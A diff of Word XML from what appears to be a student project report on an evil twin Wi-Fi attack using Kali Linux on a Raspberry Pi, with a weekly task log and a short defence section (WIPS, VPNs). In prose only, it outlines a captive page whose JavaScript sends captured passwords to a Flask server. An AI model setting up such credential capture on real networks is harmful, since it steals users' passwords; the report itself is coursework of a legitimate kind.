           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>js</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> script sending the password to the flask server we build in the kali trough port 5000</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> will automatic generate the file for password captured.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
+        <w:t xml:space="preserve"> and api will automatic generate the file for password captured.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> this situation, the evil twin AP is hard to detect as it is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>also</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>legitimate</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>AP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="29"/>
+          <w:szCs w:val="29"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  for defencing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="29"/>
+          <w:szCs w:val="29"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> against attacks performed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="29"/>
+          <w:szCs w:val="29"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, we can apply some </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">detect system that can find the evil twin AP, for example , we can use e wireless intrusion prevention systems (WIPS) to detect the presence of an evil twin AP and prevent any managed corporate clients from connecting to them. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">And also </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sing a VPN is also a good way to prevent an evil twin attack and protect users, but it will not necessarily stop users from connecting to the rogue access point. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>we</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> could disable the option to connect to unapproved wireless networks, but this could be a significant limitation for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="52"/>
+          <w:szCs w:val="37"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="52"/>
+          <w:szCs w:val="37"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Weekly log</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1271"/>
+        <w:gridCol w:w="8079"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1374"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1271" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+              <w:t>Week1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8079" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="37"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="37"/>
+              </w:rPr>
+              <w:t>LIU: find how to install the kali linux into raspberry Pi</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="37"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="37"/>
+              </w:rPr>
+              <w:t>record the screen record of task 1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="37"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="37"/>
+              </w:rPr>
+              <w:t xml:space="preserve">JIANG :install </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="37"/>
+              </w:rPr>
+              <w:t>the</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="37"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> kali linux on the raspberry </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1832"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1271" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+              <w:t>Week2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8079" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+              <w:t xml:space="preserve">LIU : </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+              <w:t>build the backend and frontend to capture the password</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+              <w:t xml:space="preserve">JIANG: configure the dnsmasq in kali </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1271" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+              <w:t>Week3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8079" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1271" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+              <w:t>Week4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8079" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+                <w:sz w:val="32"/>
+                <w:szCs w:val="32"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="29"/>
+          <w:szCs w:val="29"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -2602,6 +2795,60 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="00000001"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="00000001"/>
+    <w:lvl w:ilvl="0" w:tplc="00000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
